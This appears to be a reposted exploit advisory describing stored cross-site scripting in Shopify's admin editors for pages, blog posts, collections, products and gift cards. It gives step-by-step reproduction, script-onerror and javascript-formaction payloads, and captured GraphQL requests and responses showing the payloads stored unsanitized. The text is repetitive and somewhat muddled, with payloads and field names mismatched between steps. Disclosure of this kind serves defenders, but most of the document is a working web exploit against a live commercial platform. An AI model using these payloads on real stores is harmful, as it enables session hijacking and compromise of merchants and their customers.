Home Tools Exploits & CVE's Shopify Cross Site Scripting

Shopify Cross Site Scripting

March 16, 2023

474

Shopify suffers from a cross site scripting vulnerability.

Correspondence from Shopify declined to comment regarding new discovered
vulnerabilities within their website.

Although 'frontend' vulnerabilities are considered out of scope,
person/tester foundhimself a beefy bugbounty from the same page that has
been listed below, including similar functionality that has not been tested
yet.

Two emails and several  reports, the 'hacker-1' staff reject the bid for
findings.


Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content ->
Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of
tags from

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


1. Browse to Online Store
2. Select Pages ->  Add Page
3. Set Title -> Title_Name
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"page":{"bodyHtml":"<script src=1 href=1
onerror="javascript:alert(1)"></script>"
[...]


// HTTP response

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src="1"
href="1"
onerror="javascript:alert(1)"></script>nntest","title":"Title_Name"
[...]


Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title ->
Content -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Online Store
2. Select Blog Posts -> Add Blog Post
3. Set Title -> Blog_Title
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST
/admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script
src=1 href=1 onerror="javascript:alert(1)"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script
src="1" href="1"
onerror="javascript:alert(1)"></script>n","handle":"blog_title-2"
[...]


Products -> Collections -> Create Collection -> Title -> Product_Title ->
Description -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Collections -> Create Collection
3. Set Title -> Collection_Title
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST
/admin/internal/web/graphql/core?operation=CreateCollection&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1
href=1 onerror="javascript:alert(1)"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script
src="1" href="1" onerror="javascript:alert(1)"></script>"
[...]


Products -> Inventory -> View Products -> Double Click on Product -> Title
-> Inventory_Title -> Description -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Inventory-> View Products
3. Select Product -> Title -> Product_Title
4. Set Description  -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"descriptionHtml":"<script onerror="javascript:alert(1)"
href="1" src="1"></script>","workflow":"product-details-update"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script
onerror="javascript:alert(1)" href="1" src="1"></script>"
[...]




Products -> Add Product -> Title -> Product_Title -> Description -> Paste
Payload -> <form><button formaction="javascript:javascript:alert(1)">X
</button></form> -> Show HTML -> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Add Product -> Title -> Product_Title
3. Set Description -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
4. Select Show HTML
5. Fix HTML encoding of tags


<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"descriptionHtml":"<p>&nbsp;</p>..."><script src=1 href=1
onerror="javascript:alert(1)"></script>n</code></pre>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"title":"Gift_Title","><script src="1" href="1"
onerror="javascript:alert(1)"></script>n</code></pre>",
[...]



Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste
Payload -> <form><button formaction="javascript:javascript:alert(1)">X
</button></form> -> Show HTML -> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Gift Cards
3. Add Gift Card Products -> Gift_Title
4. Set Description -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags


<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1
onerror="javascript:alert(1)"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script
src="1" href="1" onerror="javascript:alert(1)"></script>"
[...]



1. Browse to /admin/pages
2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload
3. Online Store -> Pages -> Add Page ->

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications

Shopify Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Swedish signals intelligence agency to take over national cybersecurity center

Russian hackers target 20 energy facilities in Ukraine amid intense missile...

The company man: US glacial response to Nigeria’s detention of former...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

Chrome V8 JIT XOR Arbitrary Code Execution

Packet Storm New Exploits For February, 2021